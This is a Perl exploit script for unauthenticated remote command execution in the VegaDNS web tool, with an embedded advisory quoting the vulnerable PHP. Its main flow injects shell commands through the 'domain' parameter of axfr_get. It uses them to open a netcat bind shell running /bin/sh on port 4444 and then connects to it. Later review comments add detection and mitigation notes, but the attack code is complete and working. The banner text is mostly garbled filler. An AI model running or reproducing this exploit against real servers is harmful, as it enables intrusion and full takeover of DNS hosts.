#!/usr/bin/perl
# Banner and advisory text held in package globals.  Only $izd and $vg are
# printed later in this file; $b, $g and $a are assigned here but never
# referenced in the visible code.  All five use qq (interpolating) quotes,
# so the PHP excerpt inside $a, which mentions $file, $domain, $hostname,
# $command, $out and $_REQUEST[...], would have those names expanded as
# undeclared (empty) Perl variables rather than printed verbatim.
# NOTE(review): $a and $b are also Perl's sort() comparison variables;
# reusing them as ordinary globals is a known footgun, and the file has no
# `use strict; use warnings;` to catch it.
$izd= qq{
aaaaaaaaaaaaaa aaaaaaa aaa aaaaaa aaaaaaa aaaaaaa aaaaaaa aaaaaaa
aaaaaaaaaaaaaa aaaaaaaa aaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa aaaaa aaa aaaaaaaaa aaaaaaaaaaa aaa aaaaaaaaaaaaaa aaaaaaaaaaa
aaa aaaaa aaa aaaaaaaaaaaaaaaaaaaaa aaa aaaaaaaaaaaaaa aaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaa aaa aaaaaaaaaaa aaaaaaaaaaaaaaa
aaaaaaaaaaa aaaaaaa aaa aaaaaaaa aaa aaaaaaa aaa aaa aaaaaaa aaa
};$vg=qq{
a aaaa aaaaaaa
aa aa aaaaa aaaaaaaaaaaaaa
aaa aaaa aaa aaa a aaaaa aaaaaaaaaaaaa
a a aaa aaa aaaa aaaaaaaaaaa
aaaaa aaaaa aaaa aaaaaaaaaaaaa
aaaaaaa aaaaa aaaaa aaa aaaaaaaaaaaaa aaaaaaaaaa
a aaaaaa aaaa aaaa aa aaa aaaaaaaaaaa aaaaa
a a aa aaa aaaaaaa aaaaa aaaa aaa
aa aaa aaaaaa aaaaa aaaa aaa aaaaa aa
aaaaa aaa aaaa aaaaaaaaaa aaaaaaaaaa a aaaa
aaaaaa aaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaaaaa
aaa aaaaaaaaaaaaa aaaaaaaaaaa aaa aaaaaaaa aaa
aaaa aaaaaaa aaaaaaaaaaaaaaaaaaaa aa a aaaaaa aa
aaaaaaa aa aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa aa
aa aaaaa aaa aaaaaaa aaa aaaaaaa a aaaaaa a a
aaaaaaaaaaaaa aaa aaaaaa a aaaaa aaaaa a aa
aaaaaaaaaa aaaaaaaaaaaa a aaaaa a aaa
aaaaaaa a aaaaaaaaaaaaaa aaaaaaaa aaaaa aaaaa
aaaaaaaaaa aaaaaaaaaaa aaaaaaaaaaaaaaaa aaaaaa
aaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaa aaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaa a aaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa a
aaaaaaaaaaaaaaaaaa a a a aa
aaaaaaaaaaaaaaaaaaa aaa aaaaa
aaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaa
aaaa aaaaaaaaaaaaaaaaaaaaaa a aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa a a aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaa a aa a aa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaa aa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaa aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaa aaaa aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaa aa
aaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaa aaa
aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaa a aaaa aaa
aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaa a aaaa aaa
a aaaaaaaaaaaaaa aaaa aaaaaaaaaaaa a a a aaaa
aaaaaaaaaaaaaaaaa aaaaaaaaaaa aaa aaaaaa
a aaaaaaaaaaaaaa aa a aaaaa
a a aaa aaaaaaaa
a a a aaaaaaaaaaaaaaaaaa
a aaa aaaaaaa aaaaa aa
aaa aaaaaaaaa a aaa a
a aaaa aaaaaaa aa a
aaaaaa aaaaaa aa a a
aaaaaa aaaaaaaa a a a a
aaaaaaaaaaaaaaaaa a aa a
aaaaaaaaaaaaaaaa a aaaaaaa
aaaaaaaaaaaaaaaaaa aaaaaaaaaaaaa
aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaa aaaaaaaaaaaaa
aaaaaaaaaaaa
aaaaaaaaaaa
aaaaaaaaaaaaaaa
aaaaaaaaaaaaaaa
};$b=qq{
aaa aaaaaaaaaaa aaaaaaa aaaaaa aaaaaaa aaaa aaaaaaaaaaa
aaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa
aaa aaaaaaaaa aaa aaaaaaaaaaaaaaa aaaaaaaaa aaaaaaaaaaa
aaaa aaaaaaaaaa aaa aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa
aaaaaaa aaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa
aaaaa aaaaaaaa aaaaaaa aaa aaaaaaaaaa aaa aaaaaaaaaaaaa
aaaaaaa aaaaaaaaaaaa aaaa aaaaaaa aaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaa aaa aaaaaa
aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaa aaa aaaaaa
aaa aaaaaaaaaaaaaa aaa aaaaaaaaaaaa aaa aaaaaaaa
aaa aaaaaaaaaaaaaa aaa aaaaaaa aaa aaaaaaaa
aaaaaaaaaaa aaaaaaaaaa aaa aaaaaaa aaaaaaaaaaaa aaaaaaa aaa aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa aaaa
aaaaaa aaaaaa aaaaaaaaaaa aaa aaaaaa aaa aaaaaaaa aaaaaaa
aaaaaa aaaaaa aaaaaaa aaa aaa aaaaaa aaa aaaaaaaa aaaaa
aaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaaaaa aaa aaaaaaaa aaa
aaaaaaaaaaa aaaaaa aaaaaaaa aaaaaaa aaa aaa aaaaaaa aaa
a
aaa aaaa
aaaaa aaaa
aaaa aaaa
aaaa aaaaa
aaaaa aaaaa
aaaaa aaaaa
aaaaa aaaaa
aaaaa aaaaaa
aaaaa aaaaa
aaaaa aaaa
aaaa aaaa
aaaa aaaa
aaaa aaaa
aaaaaaaaaaaa aaaaaaaaaaaa
aaaa aaaaaaaaaaa aaaaaaaaaaa aaa
aaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaa aaa aaa aaaaaaaaa
aaa aaa aaa aaa
aaa aa a aa aaa
aa a aa a a aa aa a aaa aa aa
a aaa aaa aa aaaa aa aaaa aaa a
aa aaaaaaa aaaaaaaaaaaa aaaaaaaa aa
aa aaa aaa aa
aa a aa a a aa
aaaa aaa aa a a aa aaa aaa
aaaaaaaaaaaaa aa a a a a a aaaaaaaaaaaaa
aaa a aaa a a aaa a aa
aa aaaaaa a a a a aa a aaaaaa aa
aaaaaa aaaaa a aa aa a aaaa aaaaaa
aa a aaaaa aaaaa a aa
a aa
___ .___ .______ ._______._____ .___.__ ._______ .____ .___
.___ | |: __|: __ \ : .____/:_ ___\ : | \ : .___ \ | |___ | |
: | /\| || : || \____|| : _/\ | |___| : || : | || | || |
| |/ : || || : \ | / \| / || . || : || : || |/\
| / || || |___\|_.: __/|. __ ||___| | \_. ___/ | || / \
|______/|___||___||___| :/ :/ |. | |___| :/ |. _____/ |______/
: : :/ : :/
: : :
};$g=qq{
aaaaaaa aaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa aaaaaaaaaaaaaaaaaa aaaaaa aaa aaaaa
aaa aaaaaaaaaaaaaaaaa aaaaaa aaa aaaaa
aaaaaaaaaaaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaaa
aaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaaa
To all the people with mad skills who share their knowledge:
TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO,
mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan,
lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil,
laughing_mantis, g0tm1k, nmrc, and many many more....
};$a=qq^
aaaaaa aaaa aaa aaaaaa aaa aaa aaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaa aaaaaaaaaaaaaa aaaa aaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaaa aaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaa aaaaaaaaaaaaaaaaaaa
aaa aaaaaa aaaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaa
aaa aaaaaa aaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaal
VegaDNS is a tinydns administration tool written in PHP to allow easy
administration of DNS records through a web browser.
-- http://www.vegadns.org
The file axfr_get.php allows unauthenticated access and fails to correctly
apply input escaping to all variables that is based on user input. This
allows an attacker to inject shell syntax constructs to take control of the
command execution.
The following code from axfr_get.php shows how the variable $file becomes
tainted trough the $domain variable which is tainted from direct user input.
The application tries to prevent this by escaping the $domain and $hostname
variables, but fails to escape the $file variable.
---------------------------cut---------------------------
* NOTE:
* This functionality ONLY exists outside of the main application
* because tcplient kept dying fatally due to file descriptor 7
* being unavailable, which only occurs AFTER session_start() is
* called.
*
*/
require_once 'src/config.php';
// CHECKS
// Make sure the hostname was given
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
echo "ERROR: no hostname given\n";
exit;
}
// Make sure that some domains were given
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
echo "ERROR: no domain was supplied\n";
exit;
}
$domain = $_REQUEST['domain'];
$hostname = $_REQUEST['hostname'];
$rand = rand();
$file = "/tmp/$domain.$rand";
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
exec($command, $out);
---------------------------end---------------------------
aaaaaaaaaaa aaaaaaaaaa aaa aaaaaaa aaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa
aaaaaa aaaaaa aaaaaaaaaaa aaa aaaaaa aaa
aaaaaa aaaaaa aaaaaaa aaa aaa aaaaaa aaa
aaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaaaaa aaa
aaaaaaaaaaa aaaaaa aaaaaaaa aaaaaaa aaa aaa
^;
# Main flow: banner, argument check, two HTTP requests against the vulnerable
# axfr_get endpoint, then a local nc connect.  The script runs without
# `use strict; use warnings;`, so every variable below is a package global.
print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n";
print " "."=" x 50 ."[justanotherhacker.com]==\n";
# The only validation of the command-line argument: it must look like
# scheme://host, and the host part is captured for the final connect.
# `&usage` (no parens) also passes the caller's current @_ to usage();
# usage() itself is defined below this block.
&usage if ($ARGV[0] !~ m!.+://([^/:]+)!);
$h=$1;
print " . . . Locating netcat\n";
# The `domain` query parameter is the injection point the advisory text
# above describes: axfr_get.php builds $file from $domain without escaping
# it before the string reaches exec().  `%3b` is a URL-encoded ';'.
# Detection: web-server logs for requests to axfr_get whose domain value
# contains ';' / '%3b' or otherwise is not a plausible zone name.
# Mitigation on the application side: validate `domain` against a strict
# hostname pattern and pass every argument of the exec() string, $file
# included, through escapeshellarg().
$cmd='which+nc';
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
# $ARGV[0] is interpolated unescaped into a shell command line; a quote
# character in the argument breaks out of the single quotes.  `-k` also
# disables TLS certificate verification.  List-form
# open(my $fh, '-|', 'curl', ...) would avoid the shell entirely.
$z=`curl -s -k '$t'`;
if ($z !~ m{/nc}) {
print " ! ! ! netcat not found! Manual exploitation required:\n";
print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
exit 1;
}
print " . . . netcat found: $z\n";
print " . . . Performing IZUNA DROP!\n";
# a A* a A* a A* a A* A* A* A*
print " a a a *k* a a *p*\n";
# Second request through the same parameter.  Same shell-interpolation
# caveats as above; the `-m 3` bounds how long curl waits.  The trailing
# ' &' sits inside the single quotes, so it is sent as part of the URL
# rather than backgrounding curl (presumably intentional — confirm).
$cmd="$z+-e+/bin/sh+-lp+4444";
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -m 3 -s -k '$t &'`;
print $vg."\n";
print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
# $h comes from the command-line URL and is interpolated into a shell
# string; list-form system('nc', '-v', $h, '4444') bypasses the shell.
system("nc -v $h 4444");
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit;